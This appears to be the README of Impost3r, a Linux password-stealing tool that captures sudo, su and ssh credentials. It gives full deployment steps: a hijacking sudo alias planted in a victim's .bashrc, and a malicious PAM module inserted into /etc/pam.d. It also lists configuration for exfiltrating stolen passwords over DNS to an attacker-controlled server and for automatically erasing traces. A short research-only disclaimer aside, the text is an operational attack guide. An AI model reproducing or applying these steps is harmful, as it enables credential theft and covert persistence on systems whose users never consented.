Impost3r
1.0.0
English
Impost3r is a tool written in C language and used to steal various passwords (ssh, su, sudo) under Linux.
Users can use this program to create a watering hole to steal the passwords of legitimate users
This tool is for safety research and teaching only, and the user assumes all legal and related responsibilities resulting from the use of this tool! The author does not assume any legal and related responsibilities!
Automatically erase traces of behavior
Transfer results via DNS protocol
User indifferent
gcc
Impost3r can be used to steal passwords including sudo, su, and ssh services. These three services can be roughly divided into 2 categories, sudo and ssh/su. We will discuss them in two cases below.
It only requires ordinary user permissions. It does not require root. However, it can only steal the password of the corresponding user and cannot steal other users' passwords.
First, assume that the attacker controls a server with ordinary user rights.
Check whether the .bash_profile file exists in the user's root directory. If .bash_profile exists: check whether .bashrc is actively loaded in the .bash_profile file. If it is actively loaded, skip this step and the next two checks and continue with the subsequent operations. If If it is not actively loaded, then the next two steps of checking are skipped, and all operations for .bashrc in the following are replaced with operations for .bash_profile !!! ; If .bash_profile does not exist: proceed to the next step of checking.
Check whether the .bash_login file exists in the user root directory. If .bash_login exists: check whether .bashrc is actively loaded in the .bash_login file. If it is actively loaded, skip this step and the next check and continue with the subsequent operations. If not, skip this step and the next step. Active loading, then skip the next check, and all operations for .bashrc in the following are replaced with operations for .bash_login !!! ; If .bash_login does not exist: proceed to the next check.
Check whether a .profile file exists in the user root directory. If a .profile file exists: Check whether .bashrc is actively loaded in the .profile file (loaded by default). If it is actively loaded, skip this step and continue with the subsequent operations. , if it is not actively loaded, then all operations for .bashrc in the following are replaced with operations for .profile !!! ;If .profile does not exist, in principle, Impost3r will not be able to be used. Of course, you can also decide whether to generate a .bash_profile or .profile file depending on the situation, and write a loading code similar to the following into it to load .bashrc
if [ -n "$BASH_VERSION" ]; then # include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi
Copy a copy of the user's .bashrc : cp ~/.bashrc /tmp/ , and place this copy in the attacker's customized path (in this example, it is placed in the /tmp/ directory, and the attacker can modify it)
Modify .bashrc (~/.bashrc) in the user root directory and add the following statement in the last line (where "/tmp/.impost3r" needs to be consistent with the FILENAME below):
alias sudo='impost3r() {
if [ -f "/tmp/.impost3r" ]; then
/tmp/.impost3r "$@" && unalias sudo
else
unalias sudo;sudo "$@"
fi
}; impost3r' After the addition is completed, save the file and execute source ~/.bashrc
Then the attacker needs to modify the Impost3r source code /sudo/main.h :
/* Custom setting */ # define FILENAME "/tmp/.impost3r" 设置Impost3r在目标服务器上的位置 # define BACKUP_ORI_FILENAME ".bashrc" 表明攻击者所备份的源用户配置文件是.bashrc还是.bash_profile、.profile、.bash_login # define BACKUP_ORI_PATH "/tmp/.bashrc" 表明攻击者所备份的源用户配置文件在目标服务器上的位置 # define SAVE_OR_SEND 0 设置在窃取成功后是将结果保存在目标机器上或者是发送至攻击者控制的机器(发送=0,保存=1,默认为发送) /* Send to server */ # define YOUR_DOMAIN ".com" 注意,如果你不想购买一个域名来接收Impost3r回传的消息且被植入Impost3r的目标服务器并未禁止向你所控制的dns服务器的53端口的直接udp连接,那么这里的域名请使用默认值; 但是如果被植入Impost3r的目标服务器严格限制了dns请求的出站,那么请将YOUR_DOMAIN的值改为你所购买的域名,例如“.example.com”,并将这个域名的NS记录配置成你所控制的DNS服务器地址,在此DNS服务器上运行Fdns,并将下方REMOTE_ADDRESS的值更改为被植入Impost3r的目标服务器的默认dns地址,REMOTE_PORT更改为被植入Impost3r的目标服务器的默认dns地址所监听的dns服务端口(绝大多数情况下都是53端口) # define MAX_RESEND 30 设置当窃取到密码之后,Impost3r向攻击者服务器发送用户密码的最大重试次数 # define RESEND_INTERVAL 5 设置每一次发送密码的间隔 # define REMOTE_ADDRESS "192.168.0.12" 设置回送密码的远程地址 # define REMOTE_PORT 53 设置回送密码的远程端口 /* Save to local */ # define SAVE_LOCATION "/tmp/.cache" 设置结果文件保存的位置,在SAVE_OR_SEND设置为1的情况下
After the modification is completed, save and execute make in the current directory
Get the compiled .impost3r file in the current directory
Upload (try to compile on the target server to prevent unexpected errors) .impost3r file to the /tmp/ folder of the target server (only an example, you can modify it yourself, as long as it is the same as the definition in the source code)
The attacker starts the DNS server program on his own server and waits for the legitimate user to use sudo to obtain the password.
In the case of stealing the sudo password, Impost3r will automatically erase the traces after success, and the attacker does not need to go up and clean it manually.
Impost3r will automatically determine whether the password entered by the user is the correct password. It will not end the process until the user enters the correct password and erase the traces.
Please use sudo -v to determine whether the current user is in sudoer group before using Impost3r. If not, do not use Impost3r.
Stealing ssh/su passwords is different from the sudo password stealing and exploitation method above. It requires root privileges and can steal any user password.
The following takes Ubuntu as an example. Centos is similar. The files used and the way to modify the files may be different.
First, let’s assume that the attacker controls a server
Obtained root permissions through a privilege escalation operation (or the lovely administrator started the service with root permissions)
First edit the /ssh_su/main.h source code file of Impost3r
/* Custom setting */ # define SSH_OR_BOTH 0 设置偷取模式,0代表仅偷取ssh密码,1代表偷取ssh及su密码,默认为0(后面会讲到区别) # define SAVE_OR_SEND 0 设置在窃取成功后是将结果保存在目标机器上或者是发送至攻击者控制的机器(发送=0,保存=1,默认为发送) /* Send to server */ # define YOUR_DOMAIN ".com" 注意,如果你不想购买一个域名来接收Impost3r回传的消息且被植入Impost3r的目标服务器并未禁止向你所控制的dns服务器的53端口的直接udp连接,那么这里的域名请使用默认值; 但是如果被植入Impost3r的目标服务器严格限制了dns请求的出站,那么请将YOUR_DOMAIN的值改为你所购买的域名,例如“.example.com”,并将这个域名的NS记录配置成你所控制的DNS服务器地址,在此DNS服务器上运行Fdns,并将下方REMOTE_ADDRESS的值更改为被植入Impost3r的目标服务器的默认dns地址,REMOTE_PORT更改为被植入Impost3r的目标服务器的默认dns地址所监听的dns服务端口(绝大多数情况下都是53端口) # define MAX_RESEND 30 设置当窃取到密码之后,Impost3r向攻击者服务器发送用户密码的最大重试次数(仅当SSH_OR_BOTH为0,此选项才有效) # define RESEND_INTERVAL 5 设置每一次发送密码的间隔(仅当SSH_OR_BOTH为0,此选项才有效) # define REMOTE_ADDRESS "192.168.0.12" 设置回送密码的远程地址 # define REMOTE_PORT 53 设置回送密码的远程端口 /* Save to local */ # define SAVE_LOCATION "/tmp/.sshsucache" 设置结果文件保存的位置,在SAVE_OR_SEND设置为1的情况下
After the modification is completed, save and execute make in the current directory
Get the compiled file impost3r.so
Upload the compiled impost3r.so (try to compile it on the target server to prevent unexpected errors) to /lib/x86_64-linux-gnu/security of the target machine (different machines may have different folder names, please place them according to the situation) )
Enter /etc/pam.d . There are two situations at this time. If the selected mode is to only steal the ssh password, then you need to execute vi sshd and add the following statement at the end of the file (it should be noted here that except for Ubuntu, other based on This file of Linux system may be quite different from Ubuntu. It is recommended to read the rules yourself and then add them in the appropriate location)
auth optional impost3r.so account optional impost3r.so
Save and exit, restart the sshd service service sshd restart
If you choose to steal the ssh and su passwords together, you need to execute vi common-auth , add the same statement, save and exit, and restart the sshd service as well.
The attacker starts the DNS server program on his own server and waits for the legitimate user to use ssh to log in to the target machine or use su to switch users to obtain the password.
In the case of stealing the ssh/su password, Impost3r cannot clear the traces due to permission reasons, and the attacker needs to clear it himself.
Please note that if only the SSH password is set to be stolen, it is basically guaranteed that the attacker will receive the result of the theft 100%, but if both are set to steal at the same time, it is not necessarily guaranteed that the attacker will receive the result of theft (only if set When sending for dns, setting it to save locally will not be affected)
It is not recommended to steal the su password, and since the user's ssh password is the same as the su password, if you can't steal the su password, don't steal it. The ssh password is enough.
Empty passwords are not stolen by default. Please try to see if the user has an empty password (check whether there is PermitEmptyPasswords yes in the sshd configuration file. If it is empty, then it is still a ghost.)
I used Fdns for the Dns server program and modified some parameters. You can find the modified source code in the folder Fdns. Please use the command gcc -o dns main.c util.c to compile it yourself (note that you must modify it first listening port in main.c)
Before compiling Fdns, please check the YOUR_DOMAIN value in util.h to ensure that this value is consistent with the YOUR_DOMAIN value used when compiling the Impost3r program implanted on the server, otherwise the theft may fail.
This program is only developed and studied in your spare time. There may be bugs in its functions. Please forgive me and welcome feedback.
f
libbaseencode
